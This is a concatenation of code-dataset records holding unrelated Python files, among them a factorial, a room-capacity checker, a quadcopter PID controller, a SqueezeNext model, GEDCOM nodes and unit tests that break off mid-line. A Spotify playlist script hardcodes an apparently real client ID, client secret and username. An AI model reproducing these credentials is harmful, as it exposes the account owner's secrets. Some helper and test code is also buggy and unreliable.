USING RECURSION\n\ndef factorial(a):\n if a==0:\n return 1\n return a * factorial(a-1) # it is working like 5*4*factorail(4-1).....\n # return 5*4*3*2*1*1\n\nresult=factorial(5)\nprint(result) ","repo_name":"debankanmitra/Python4e","sub_path":"recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26383044689","text":"filePath = \"./Room Capacities.csv\"\n\n# Setup dictionary to hold room name and capacity\nroomCapacityDict = {}\n\n# 1. Read the contents of the file\n\nwith open(filePath) as fileHandle:\n \n # Store each line in the dictionary, cleaning as necessary\n for line in fileHandle.readlines():\n # 2. Filter/clean data as necessary\n\n # Don't store the first line of the file, as this is a header\n if (line[0:4] != \"Room\"):\n # Remove white space from line, including new line character\n lineCleaned = line.strip()\n \n # Separate the line in to two parts, store as list\n lineSplit = lineCleaned.split(\",\")\n \n roomName = lineSplit[0]\n roomCapacity = lineSplit[1]\n \n # 3. Store data in a dictionary for comparison\n roomCapacityDict[roomName] = roomCapacity\n\n# Optional: Print list of available rooms for the user\nprint(\"Available Rooms:\")\nfor roomName in roomCapacityDict.keys():\n print(roomName)\n\n# Add line separator between room names and user input\nprint(\"\\n\")\n\n\n\n# 4. Ask user for room name as input\n# Optional: Ensure user selects a room that exists\nuserRoomNameInput = \"\"\nwhile (userRoomNameInput not in roomCapacityDict.keys()):\n \n # Ask for and store user input\n userRoomNameInput = input(\"Which room will you be using: \")\n \n # If the room the user is trying to use does not exist, inform the user.\n # When the loop cycles through, the user will be asked to input the room again\n if (userRoomNameInput not in roomCapacityDict.keys()):\n print(\"Room name not found. Please select the name of a room within the building. Available names are as follows: \")\n \n # This is a list comprehension, a short-hand form of a for loop\n [print(room) for room in roomCapacityDict.keys()]\n\n\n\n# 5. Ask user for number of attendees using room\nuserCapacityInput = input(\"How many members will attend: \")\n\n# 6. Check if the room can accommodate, and report\nchosenRoomCapacity = roomCapacityDict[userRoomNameInput]\n\n# Optional: Output user's data and room data\nprint(\"Chosen room: \",userRoomNameInput)\nprint(\"Attendees: \", userCapacityInput)\nprint(\"Room Limit: \", chosenRoomCapacity)\n\n# Finally, report if the room can accommodate the employees or not\nif (int(chosenRoomCapacity) < int(userCapacityInput)):\n print(\"Number of attendees exceeds room capacity\")\nelse:\n print(\"Room can accommodate number of attendees\")\n \n \n\"\"\"\nEnding Notes:\n \n This example shows some user input, as well as how to check for simple\n errors that may occur due to the user not inputting correct values.\n \n The code also shows how to filter/clean data from an ideal .csv file. 
User\n    input and data errors require more focused scrubbing.\n\"\"\" \n    \n    \n","repo_name":"dbowmans46/PracticalProgramming","sub_path":"Session 7 - Python/Instructional Material/Worked Example Problems/Problem 2 - Meeting Capacity Checker.py","file_name":"Problem 2 - Meeting Capacity Checker.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7833614540","text":"# 2. Trailing Zeros \n# Write an algorithm which computes the number of trailing zeros in n factorial.\n# \n# Have you met this question in a real interview? Yes\n# Example\n# 11! = 39916800, so the output should be 2\n\nclass Solution:\n    \"\"\"\n    @param: n: An integer\n    @return: An integer, denote the number of trailing zeros in n!\n    \"\"\"\n    def trailingZeros(self, n):\n        # write your code here, try to do it without arithmetic operators\n        res = 0\n        i = 5\n        while i <= n:\n            res += n // i\n            i *= 5\n        return res\n    \n","repo_name":"yihanc/LC","sub_path":"LINTCODE/2_trailing_zeros.py","file_name":"2_trailing_zeros.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17117974527","text":"import numpy as np\nfrom transforms3d import quaternions, euler\n\neuler = euler.EulerFuncs('rxyz')\n\ndef skew_symmetric(vec):\n    # Cross-product matrix: skew_symmetric(v) @ u == np.cross(v, u)\n    mat = np.array(\n        [\n            [0, -vec[2], vec[1]],\n            [vec[2], 0, -vec[0]],\n            [-vec[1], vec[0], 0]\n        ]\n    )\n\n    return mat\nclass PIDController:\n    def __init__(self, dt, p_gain, i_gain = 0, d_gain = 0, sat=None, name = 'default'):\n        self.name = name\n        self.dt = dt\n        self.p_gain = p_gain\n        self.i_gain = i_gain\n        self.d_gain = d_gain\n        self.sat = sat\n        self.integrated_error = 0.\n        self.prev_error = 0.\n    def update(self, sp, fb):\n        \"\"\"Compute the PID command signal\n\n        Args:\n            sp (float): reference signal Set point\n            fb (float): Sensor Feedback\n\n        Returns:\n            output (float): command signal\n\n        \"\"\"\n        dt = self.dt\n        error = sp - fb\n        self.integrated_error = self.integrated_error + (self.prev_error + error) / 2 * dt\n        p_term = self.p_gain * (error)\n        i_term = self.i_gain * (self.integrated_error)\n        d_term = self.d_gain * (error - self.prev_error) / dt\n        output = p_term + i_term + d_term\n        self.prev_error = error\n        if (self.sat is not None):\n            # set Saturation\n            output = min(output, self.sat)\n            output = max(output, -self.sat)\n        return output\n\n    @property\n    def reset_integral(self):\n        self.integrated_error = 0\n\n\ndef quar_axis_error(q_sp, q_state):\n    \"\"\"Compute the error in quaternions from the setpoints and robot state\n\n    Args:\n        q_sp (np.array): Reference signal Set point quaternion\n        q_state (np.array): Sensor Feedback quaternion\n    Returns:\n        exponential angle (np.array)\n    \"\"\"\n\n    # Quaternion multiplication q_set * (q_state)' target - state\n\n    q_state_conj = quaternions.qconjugate(q_state)\n    q_error = quaternions.qmult(q_sp,q_state_conj)\n\n    # Nearest rotation\n    if (q_error[0] < 0):\n        q_error = -1. 
* q_error\n\n axis_error = quaternions.quat2axangle(q_error)\n return axis_error[0] * axis_error[1]\n\ndef thrust_tilt(eulAng,PWM_hover):\n\n phi = eulAng[0] # Roll\n theta = eulAng[1] # Pitch\n psi = eulAng[2]\n scaling = 1./(abs(np.sqrt(np.cos(phi)*np.cos(theta))))\n scaling = min (scaling, 1.3)\n return PWM_hover*scaling\n\n\nclass FlightComputer:\n def __init__(self, dt, fc_config):\n gains = fc_config['gains']\n self.roll_controller = PIDController(dt, gains['Kp_roll'], sat= gains['PR_SAT'], name='Roll')\n self.pitch_controller = PIDController(dt, gains['Kp_pitch'], sat = gains['PR_SAT'], name='Pitch')\n self.yaw_controller = PIDController(dt, gains['Kp_yaw'], name='Yaw')\n self.alt_controller = PIDController(dt, gains['Kp_vzSAT'], sat = gains['Kp_vzSAT'], name='Alt')\n self.p_controller = PIDController(dt,gains['Kp_p'], name='p')\n self.q_controller = PIDController(dt,gains['Kp_q'], name='q')\n self.r_controller = PIDController(dt,gains['Kp_r'], name='r')\n self.u2motor = fc_config[\"cmd2motor_map\"]\n self.esc_min = fc_config[\"esc_settings\"][\"Saturation\"][0]\n self.esc_max = fc_config[\"esc_settings\"][\"Saturation\"][1]\n\n self.PWM_hover = None\n\n def target_generator(self,eulAngSP):\n # Temp solution to get sp, should would be generated by guidance\n q_sp = euler.euler2quat(eulAngSP[0], eulAngSP[1], eulAngSP[2]) # XYZ\n vzSP = 0\n return q_sp, vzSP\n\n def update (self, sensor_data, eulAngSP):\n vz = sensor_data['vz']\n q_state = sensor_data['q_state']\n p = sensor_data['p']\n q = sensor_data['q']\n r = sensor_data['r']\n eulAng = np.array(euler.quat2euler(q_state))\n rateSP = np.zeros(3)\n\n q_sp, vzSP = self.target_generator(eulAngSP)\n ## Calculating quartenion error\n\n axis_error = quar_axis_error(q_sp,q_state)\n ## Cascade PID\n rateSP[0] = self.roll_controller.update(axis_error[0], 0.)\n rateSP[1] = self.pitch_controller.update(axis_error[1], 0.)\n rateSP[2] = self.yaw_controller.update(axis_error[2], 0.)\n u = np.zeros(4)\n u[0] = thrust_tilt(eulAng, self.PWM_hover[0]) -self.alt_controller.update(vzSP, vz)\n u[1] = self.p_controller.update(rateSP[0], p)\n u[2] = self.q_controller.update(rateSP[1], q)\n u[3] = self.r_controller.update(rateSP[2], r)\n\n ## ESC ##\n PWM = np.dot(self.u2motor,u)\n # ESC Saturation\n for val in range(0, 4):\n PWM[val] = min(PWM[val], self.esc_max)\n PWM[val] = max(PWM[val], self.esc_min)\n\n log = [eulAng, eulAngSP, u, PWM, rateSP]\n return PWM, log\n\n\nclass KalmanFilter:\n def __init__(self):\n self.P = np.zeros([4,4])\n\n def _est_predict(self, k_state):\n pass\n def _est_update(self):\n pass\n def update(self):\n pass\n\nclass AttitudeEstimation:\n pass","repo_name":"hassanarif87/quadcopter","sub_path":"Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":4959,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"720272525","text":"import requests\nfrom bs4 import BeautifulSoup\nimport os\nimport spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\nfrom pprint import pprint\n\nSPOTIFY_CLIENT_ID = \"57ba76a3dcfc4142b3bcaf9d7e23490b\"\nSPOTIFY_CLIENT_SECRET = \"a976a14eddd243bd8a5f1d7ff8e0e4d9\"\n\ndate_choice = input(\"What time period would you like to travel to? 
Please type in the format YYYY-MM-DD:\\n\")\nyear = date_choice.split('-')[0]\n\n# 1992-04-20 Save The Best For Last\nmusic_url_with_date = \"https://www.billboard.com/charts/hot-100/\"+date_choice\nbillboards_response = requests.get(music_url_with_date)\nmusic_parsed = BeautifulSoup(billboards_response.text, \"html.parser\")\nsong_titles_tags = music_parsed.find_all(name=\"span\", class_=\"chart-element__information__song text--truncate \"\n \"color--primary\")\nsong_titles_list = [titles.text for titles in song_titles_tags]\n\nspotify_scope = \"playlist-modify-private\"\n\nsp = spotipy.Spotify(\n auth_manager=SpotifyOAuth(\n client_id=SPOTIFY_CLIENT_ID,\n client_secret=SPOTIFY_CLIENT_SECRET,\n scope=spotify_scope,\n redirect_uri=\"http://example.com\",\n username=\"8cjzxg2uhs0pcpbszmiez98ro\",\n show_dialog=True,\n cache_path=\"token.txt\"\n )\n)\nsongs_search_details = {}\nuser_id = sp.current_user()[\"id\"]\n\nsong_uris = []\ncount_unavailable = 0\nfor title in song_titles_list:\n try:\n response = sp.search(q=f\"track: {title} year:{date_choice.split('-')[0]}\", type=\"track\", limit=\"1\")\n song_uris.append(response[\"tracks\"][\"items\"][-1][\"uri\"])\n except IndexError:\n count_unavailable += 1\n print(f\"{count_unavailable}: {title} is not available \")\n\ncreate_playlist_response = sp.user_playlist_create(\n name=f\"Top 100 Songs from {date_choice}\",\n public=\"false\",\n description=f\"Playlist of top 100 songs from the week of {date_choice}\",\n user=user_id,\n)\n\nplaylist_id = create_playlist_response[\"id\"]\nadd_songs_response = sp.playlist_add_items(playlist_id=playlist_id, items=song_uris)\n","repo_name":"poshpeck/spotify-palylist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18677173846","text":"\"\"\"\n SqueezeNext for ImageNet-1K, implemented in PyTorch.\n Original paper: 'SqueezeNext: Hardware-Aware Neural Network Design,' https://arxiv.org/abs/1803.10615.\n\"\"\"\n\n__all__ = ['SqueezeNext', 'sqnxt23_w1', 'sqnxt23_w3d2', 'sqnxt23_w2', 'sqnxt23v5_w1', 'sqnxt23v5_w3d2', 'sqnxt23v5_w2']\n\nimport os\nimport torch.nn as nn\nimport torch.nn.init as init\nfrom .common import ConvBlock, conv1x1_block, conv7x7_block\n\n\nclass SqnxtUnit(nn.Module):\n \"\"\"\n SqueezeNext unit.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n stride : int or tuple/list of 2 int\n Strides of the convolution.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n stride):\n super(SqnxtUnit, self).__init__()\n if stride == 2:\n reduction_den = 1\n self.resize_identity = True\n elif in_channels > out_channels:\n reduction_den = 4\n self.resize_identity = True\n else:\n reduction_den = 2\n self.resize_identity = False\n\n self.conv1 = conv1x1_block(\n in_channels=in_channels,\n out_channels=(in_channels // reduction_den),\n stride=stride,\n bias=True)\n self.conv2 = conv1x1_block(\n in_channels=(in_channels // reduction_den),\n out_channels=(in_channels // (2 * reduction_den)),\n bias=True)\n self.conv3 = ConvBlock(\n in_channels=(in_channels // (2 * reduction_den)),\n out_channels=(in_channels // reduction_den),\n kernel_size=(1, 3),\n stride=1,\n padding=(0, 1),\n bias=True)\n self.conv4 = ConvBlock(\n in_channels=(in_channels // reduction_den),\n out_channels=(in_channels // reduction_den),\n kernel_size=(3, 1),\n stride=1,\n padding=(1, 0),\n bias=True)\n 
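# Design note (added): the (1,3) and (3,1) convolutions above are SqueezeNext's\n        # separable replacement for a single 3x3 convolution; conv5 below projects\n        # back to out_channels with a 1x1 convolution before the residual addition\n        # in forward().\n        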
self.conv5 = conv1x1_block(\n in_channels=(in_channels // reduction_den),\n out_channels=out_channels,\n bias=True)\n\n if self.resize_identity:\n self.identity_conv = conv1x1_block(\n in_channels=in_channels,\n out_channels=out_channels,\n stride=stride,\n bias=True)\n self.activ = nn.ReLU(inplace=True)\n\n def forward(self, x):\n if self.resize_identity:\n identity = self.identity_conv(x)\n else:\n identity = x\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.conv5(x)\n x = x + identity\n x = self.activ(x)\n return x\n\n\nclass SqnxtInitBlock(nn.Module):\n \"\"\"\n SqueezeNext specific initial block.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels):\n super(SqnxtInitBlock, self).__init__()\n self.conv = conv7x7_block(\n in_channels=in_channels,\n out_channels=out_channels,\n stride=2,\n padding=1,\n bias=True)\n self.pool = nn.MaxPool2d(\n kernel_size=3,\n stride=2,\n ceil_mode=True)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.pool(x)\n return x\n\n\nclass SqueezeNext(nn.Module):\n \"\"\"\n SqueezeNext model from 'SqueezeNext: Hardware-Aware Neural Network Design,' https://arxiv.org/abs/1803.10615.\n\n Parameters:\n ----------\n channels : list of list of int\n Number of output channels for each unit.\n init_block_channels : int\n Number of output channels for the initial unit.\n final_block_channels : int\n Number of output channels for the final block of the feature extractor.\n in_channels : int, default 3\n Number of input channels.\n in_size : tuple of two ints, default (224, 224)\n Spatial size of the expected input image.\n num_classes : int, default 1000\n Number of classification classes.\n \"\"\"\n def __init__(self,\n channels,\n init_block_channels,\n final_block_channels,\n in_channels=3,\n in_size=(224, 224),\n num_classes=1000):\n super(SqueezeNext, self).__init__()\n self.in_size = in_size\n self.num_classes = num_classes\n\n self.features = nn.Sequential()\n self.features.add_module(\"init_block\", SqnxtInitBlock(\n in_channels=in_channels,\n out_channels=init_block_channels))\n in_channels = init_block_channels\n for i, channels_per_stage in enumerate(channels):\n stage = nn.Sequential()\n for j, out_channels in enumerate(channels_per_stage):\n stride = 2 if (j == 0) and (i != 0) else 1\n stage.add_module(\"unit{}\".format(j + 1), SqnxtUnit(\n in_channels=in_channels,\n out_channels=out_channels,\n stride=stride))\n in_channels = out_channels\n self.features.add_module(\"stage{}\".format(i + 1), stage)\n self.features.add_module(\"final_block\", conv1x1_block(\n in_channels=in_channels,\n out_channels=final_block_channels,\n bias=True))\n in_channels = final_block_channels\n self.features.add_module(\"final_pool\", nn.AvgPool2d(\n kernel_size=7,\n stride=1))\n\n self.output = nn.Linear(\n in_features=in_channels,\n out_features=num_classes)\n\n self._init_params()\n\n def _init_params(self):\n for name, module in self.named_modules():\n if isinstance(module, nn.Conv2d):\n init.kaiming_uniform_(module.weight)\n if module.bias is not None:\n init.constant_(module.bias, 0)\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n x = self.output(x)\n return x\n\n\ndef get_squeezenext(version,\n width_scale,\n model_name=None,\n pretrained=False,\n root=os.path.join(\"~\", \".torch\", \"models\"),\n **kwargs):\n \"\"\"\n Create SqueezeNext model with specific 
parameters.\n\n Parameters:\n ----------\n version : str\n Version of SqueezeNet ('23' or '23v5').\n width_scale : float\n Scale factor for width of layers.\n model_name : str or None, default None\n Model name for loading pretrained model.\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.torch/models'\n Location for keeping the model parameters.\n \"\"\"\n\n init_block_channels = 64\n final_block_channels = 128\n channels_per_layers = [32, 64, 128, 256]\n\n if version == '23':\n layers = [6, 6, 8, 1]\n elif version == '23v5':\n layers = [2, 4, 14, 1]\n else:\n raise ValueError(\"Unsupported SqueezeNet version {}\".format(version))\n\n channels = [[ci] * li for (ci, li) in zip(channels_per_layers, layers)]\n\n if width_scale != 1:\n channels = [[int(cij * width_scale) for cij in ci] for ci in channels]\n init_block_channels = int(init_block_channels * width_scale)\n final_block_channels = int(final_block_channels * width_scale)\n\n net = SqueezeNext(\n channels=channels,\n init_block_channels=init_block_channels,\n final_block_channels=final_block_channels,\n **kwargs)\n\n if pretrained:\n if (model_name is None) or (not model_name):\n raise ValueError(\"Parameter `model_name` should be properly initialized for loading pretrained model.\")\n from .model_store import download_model\n download_model(\n net=net,\n model_name=model_name,\n local_model_store_dir_path=root)\n\n return net\n\n\ndef sqnxt23_w1(**kwargs):\n \"\"\"\n 1.0-SqNxt-23 model from 'SqueezeNext: Hardware-Aware Neural Network Design,' https://arxiv.org/abs/1803.10615.\n\n Parameters:\n ----------\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.torch/models'\n Location for keeping the model parameters.\n \"\"\"\n return get_squeezenext(version=\"23\", width_scale=1.0, model_name=\"sqnxt23_w1\", **kwargs)\n\n\ndef sqnxt23_w3d2(**kwargs):\n \"\"\"\n 1.5-SqNxt-23 model from 'SqueezeNext: Hardware-Aware Neural Network Design,' https://arxiv.org/abs/1803.10615.\n\n Parameters:\n ----------\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.torch/models'\n Location for keeping the model parameters.\n \"\"\"\n return get_squeezenext(version=\"23\", width_scale=1.5, model_name=\"sqnxt23_w3d2\", **kwargs)\n\n\ndef sqnxt23_w2(**kwargs):\n \"\"\"\n 2.0-SqNxt-23 model from 'SqueezeNext: Hardware-Aware Neural Network Design,' https://arxiv.org/abs/1803.10615.\n\n Parameters:\n ----------\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.torch/models'\n Location for keeping the model parameters.\n \"\"\"\n return get_squeezenext(version=\"23\", width_scale=2.0, model_name=\"sqnxt23_w2\", **kwargs)\n\n\ndef sqnxt23v5_w1(**kwargs):\n \"\"\"\n 1.0-SqNxt-23v5 model from 'SqueezeNext: Hardware-Aware Neural Network Design,' https://arxiv.org/abs/1803.10615.\n\n Parameters:\n ----------\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.torch/models'\n Location for keeping the model parameters.\n \"\"\"\n return get_squeezenext(version=\"23v5\", width_scale=1.0, model_name=\"sqnxt23v5_w1\", **kwargs)\n\n\ndef sqnxt23v5_w3d2(**kwargs):\n \"\"\"\n 1.5-SqNxt-23v5 model from 'SqueezeNext: Hardware-Aware Neural Network Design,' https://arxiv.org/abs/1803.10615.\n\n Parameters:\n ----------\n pretrained : bool, default False\n Whether to load 
the pretrained weights for model.\n root : str, default '~/.torch/models'\n Location for keeping the model parameters.\n \"\"\"\n return get_squeezenext(version=\"23v5\", width_scale=1.5, model_name=\"sqnxt23v5_w3d2\", **kwargs)\n\n\ndef sqnxt23v5_w2(**kwargs):\n \"\"\"\n 2.0-SqNxt-23v5 model from 'SqueezeNext: Hardware-Aware Neural Network Design,' https://arxiv.org/abs/1803.10615.\n\n Parameters:\n ----------\n pretrained : bool, default False\n Whether to load the pretrained weights for model.\n root : str, default '~/.torch/models'\n Location for keeping the model parameters.\n \"\"\"\n return get_squeezenext(version=\"23v5\", width_scale=2.0, model_name=\"sqnxt23v5_w2\", **kwargs)\n\n\ndef _calc_width(net):\n import numpy as np\n net_params = filter(lambda p: p.requires_grad, net.parameters())\n weight_count = 0\n for param in net_params:\n weight_count += np.prod(param.size())\n return weight_count\n\n\ndef _test():\n import torch\n\n pretrained = False\n\n models = [\n sqnxt23_w1,\n sqnxt23_w3d2,\n sqnxt23_w2,\n sqnxt23v5_w1,\n sqnxt23v5_w3d2,\n sqnxt23v5_w2,\n ]\n\n for model in models:\n\n net = model(pretrained=pretrained)\n\n # net.eval()\n net.train()\n weight_count = _calc_width(net)\n print(\"m={}, {}\".format(model.__name__, weight_count))\n assert (model != sqnxt23_w1 or weight_count == 724056)\n assert (model != sqnxt23_w3d2 or weight_count == 1511824)\n assert (model != sqnxt23_w2 or weight_count == 2583752)\n assert (model != sqnxt23v5_w1 or weight_count == 921816)\n assert (model != sqnxt23v5_w3d2 or weight_count == 1953616)\n assert (model != sqnxt23v5_w2 or weight_count == 3366344)\n\n x = torch.randn(1, 3, 224, 224)\n y = net(x)\n y.sum().backward()\n assert (tuple(y.size()) == (1, 1000))\n\n\nif __name__ == \"__main__\":\n _test()\n","repo_name":"osmr/imgclsmob","sub_path":"pytorch/pytorchcv/models/squeezenext.py","file_name":"squeezenext.py","file_ext":"py","file_size_in_byte":12238,"program_lang":"python","lang":"en","doc_type":"code","stars":2864,"dataset":"github-code","pt":"37"} +{"seq_id":"8599218125","text":"from typing import *\n\nfrom src.geometry import Point, Segment, Trapezoid\nfrom src.util import *\n\n\nclass Node:\n \"\"\"Class for the nodes of a search structure.\n\n Attributes:\n parents (Set[Node]): The parents.\n left_child (Optional[Node]): The left child.\n right_child (Optional[Node]): The right child.\n \"\"\"\n\n def __init__(self) -> None:\n \"\"\"Initializes Node.\n \"\"\"\n\n self.parents = set()\n self.left_child = None\n self.right_child = None\n\n def __str__(self) -> str:\n \"\"\"Returns the string representation of a Node object.\n \"\"\"\n\n res = \"\"\n res += \"\\tNode ID: \" + get_id(self) + \"\\n\"\n res += \"\\tleft_child:\\t\" + get_id(self.left_child) + \"\\n\"\n res += \"\\tright_child:\\t\" + get_id(self.right_child) + \"\\n\"\n\n return res\n\n def add_parent(self, parent: \"Node\") -> None:\n \"\"\"Adds a new parent for the current node.\n\n Args:\n parent (Node): The new parent.\n \"\"\"\n\n self.parents.add(parent)\n\n def remove_parents(self):\n \"\"\"Removes all parents from the current node.\n \"\"\"\n\n # Clear the parents.\n self.parents.clear()\n\n def set_left_child(self, child: Optional[\"Node\"]) -> None:\n \"\"\"Sets the left child of the current node.\n\n Args:\n child (Optional[Node]): The left child.\n \"\"\"\n\n self.left_child = child\n\n if child is not None:\n # Add the current node as a parent of the child.\n child.add_parent(self)\n\n def set_right_child(self, child: Optional[\"Node\"]) -> None:\n 
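# Note (added): like set_left_child above, this also registers self as a\n        # parent of the new child, keeping the search DAG's parent links consistent.\n        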
\"\"\"Sets the right child of the current node.\n\n Args:\n child (Optional[Node]): The right child.\n \"\"\"\n\n self.right_child = child\n\n if child is not None:\n # Add the current node as a parent of the child.\n child.add_parent(self)\n\n def replace_leaf(self, old: \"Node\") -> None:\n \"\"\"Replaces an existing leaf by updating the children of all its parents.\n\n Args:\n old (Node): The leaf to replace.\n \"\"\"\n\n # Iterate over all the parents of the old leaf.\n for parent in old.parents:\n if old == parent.left_child:\n # Become the new left child.\n parent.set_left_child(self)\n if old == parent.right_child: #\n # Become the new right child.\n parent.set_right_child(self)\n\n # old.remove_parents()\n\n def traverse(self, q: Point) -> Optional[\"Node\"]:\n \"\"\"Recursively traverses the search structure until a leaf, or an X-node if the point is already present.\n\n In the search structure, each leaf represents a trapezoid of the refined subdivision. The search starts from the\n root and, by evaluating the inner nodes, a path to a leaf is obtained.\n X-nodes represent endpoints of the subdivision: the query point is either to the left or to the right.\n Y-nodes represent segments of the subdivision: the query point is either above or below.\n The traversal is performed recursively, exploiting the tree-like structure of the DAG.\n\n Args:\n q (Point): The query point.\n\n Returns:\n Optional[Node]: The resulting node.\n \"\"\"\n\n # If the node is a leaf, it represents a trapezoid.\n if isinstance(self, LeafNode):\n print(\"Trapezoid ID: \" + get_id(self.trapezoid))\n return self\n else:\n # If the node is an X-node, it represents an endpoint.\n if isinstance(self, XNode):\n if q.x == self.point.x and q.y == self.point.y:\n # Stop the traversal at the current X-node.\n return self\n else:\n if q.lies_left(self.point):\n print(\"<-\\t\" + str(self.point))\n nnext = self.left_child\n else:\n print(\"->\\t\" + str(self.point))\n nnext = self.right_child\n\n # If the node is a Y-node, it represents as segment.\n elif isinstance(self, YNode):\n if q.x == self.segment.p.x and q.y == self.segment.p.y:\n # Stop the traversal at the current Y-node.\n return self\n else:\n if q.lies_above(self.segment):\n print(\"/\\\\\\t\" + str(self.segment))\n nnext = self.left_child\n else:\n print(\"\\\\/\\t\" + str(self.segment))\n nnext = self.right_child\n\n else:\n print(\"Error: Wrong node type.\")\n return\n\n # Recursively traverse the DAG.\n return nnext.traverse(q)\n\n\nclass XNode(Node):\n \"\"\"Class for X-nodes of a search structure.\n\n Attributes:\n point (Point): The referenced endpoint.\n \"\"\"\n\n def __init__(self, point: Point) -> None:\n \"\"\"Initializes XNode with the referenced endpoint.\n\n Args:\n point: The referenced endpoint.\n \"\"\"\n\n super().__init__()\n self.point = point\n\n def __str__(self) -> str:\n \"\"\"Returns the string representation of a XNode object.\n \"\"\"\n\n res = super().__str__()\n res += \"\\tPoint: \" + str(self.point) + \"\\n\"\n\n return res\n\n\nclass YNode(Node):\n \"\"\"Class for Y-nodes of a search structure.\n\n Attributes:\n segment (Segment): The referenced segment.\n \"\"\"\n\n def __init__(self, segment: Segment) -> None:\n \"\"\"Initializes YNode with the referenced segment.\n\n Args:\n segment: The referenced segment.\n \"\"\"\n\n super().__init__()\n self.segment = segment\n\n def __str__(self) -> str:\n \"\"\"Returns the string representation of a YNode object.\n \"\"\"\n\n res = super().__str__()\n res += \"\\tSegment: \" + 
str(self.segment) + \"\\n\"\n\n        return res\n\n\nclass LeafNode(Node):\n    \"\"\"Class for leaf nodes of a search structure.\n\n    Attributes:\n        trapezoid (Trapezoid): The referenced trapezoid.\n    \"\"\"\n\n    def __init__(self, trapezoid: Trapezoid) -> None:\n        \"\"\"Initializes LeafNode with the referenced trapezoid.\n\n        Args:\n            trapezoid: The referenced trapezoid.\n        \"\"\"\n\n        super().__init__()\n        self.trapezoid = trapezoid\n","repo_name":"giacomocallegari/spatial-databases-project","sub_path":"src/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":6442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24204386857","text":"# Create a file, e.g., yahoo_finance_api.py\n\nimport requests\n\nYAHOO_FINANCE_BASE_URL = \"https://query1.finance.yahoo.com/v7/finance/quote\"\n\ndef get_stock_data(symbol):\n    url = f\"{YAHOO_FINANCE_BASE_URL}/{symbol}?fields=symbol,shortName,regularMarketPrice,regularMarketOpen,regularMarketDayHigh,regularMarketDayLow\"\n    response = requests.get(url)\n    if response.status_code == 200:\n        data = response.json()\n        return data.get(\"quoteSummary\", {}).get(\"result\", [])[0]\n    else:\n        return None\n","repo_name":"Gadom654/inzynierka","sub_path":"stock_app/yahoo_finance_api.py","file_name":"yahoo_finance_api.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70688622186","text":"import unittest\r\n\r\nfrom models.Individual import Individual\r\nfrom models.Family import Family\r\nfrom models.Gedcom import Gedcom\r\n\r\nSUPPORT_TAGS = {\"INDI\", \"NAME\", \"SEX\", \"BIRT\", \"DEAT\", \"FAMC\", \"FAMS\", \"FAM\", \"MARR\", \"HUSB\", \"WIFE\", \"CHIL\",\r\n                \"DIV\", \"DATE\", \"HEAD\", \"TRLR\", \"NOTE\"}\r\n\r\n\r\nG1 = Gedcom('../testing_files/right.ged', SUPPORT_TAGS)\r\nG2 = Gedcom('../testing_files/wrong.ged', SUPPORT_TAGS)\r\n\r\nclass sprint3Test(unittest.TestCase):\r\n\r\n    #List all deceased individuals in a GEDCOM file\r\n    def test_US29_list_deceased(self):\r\n        self.assertEqual(len(G1.listDeceased()), 5)\r\n        self.assertNotEqual(len(G1.listDeceased()), 3)\r\n        deceasedPeople = []\r\n        for indi in deceasedPeople:\r\n            self.assertIn(indi, G1.listDeceased())\r\n\r\n    #List all living married people in a GEDCOM file\r\n    def test_US30_list_living_married(self):\r\n        self.assertEqual(len(G1.listLivingMarried()), 5)\r\n        self.assertNotEqual(len(G1.listLivingMarried()), 3)\r\n        marriedPeople = []\r\n        for indi in marriedPeople:\r\n            self.assertIn(indi, G1.listLivingMarried())\r\n\r\n    #List all living people over 30 who have never been married in a GEDCOM file\r\n    def test_US31_list_living_single(self):\r\n        self.assertEqual(len(G1.listLivingSingle()), 5)\r\n        self.assertNotEqual(len(G1.listLivingSingle()), 3)\r\n        singlePeople = []\r\n        for indi in singlePeople:\r\n            self.assertIn(indi, G1.listLivingSingle())\r\n\r\n    #List all multiple births in a GEDCOM file\r\n    def test_US32_list_multiple_births(self):\r\n        self.assertEqual(len(G1.listMultipleBirths()), 4)\r\n        MultipleBirths = []\r\n        for birt in MultipleBirths:\r\n            self.assertIn(birt, G1.listMultipleBirths())\r\n\r\n    #List all orphaned children (both parents dead and child < 18 years old) in a GEDCOM file\r\n    def test_US33_list_orphans(self):\r\n\r\n        self.assertEqual(len(G1.listOrphans()), 4)\r\n        OrphansPeople = []\r\n        for indi in OrphansPeople:\r\n            self.assertIn(indi, G1.listOrphans())\r\n\r\n    #List all couples who were married when the older spouse was more 
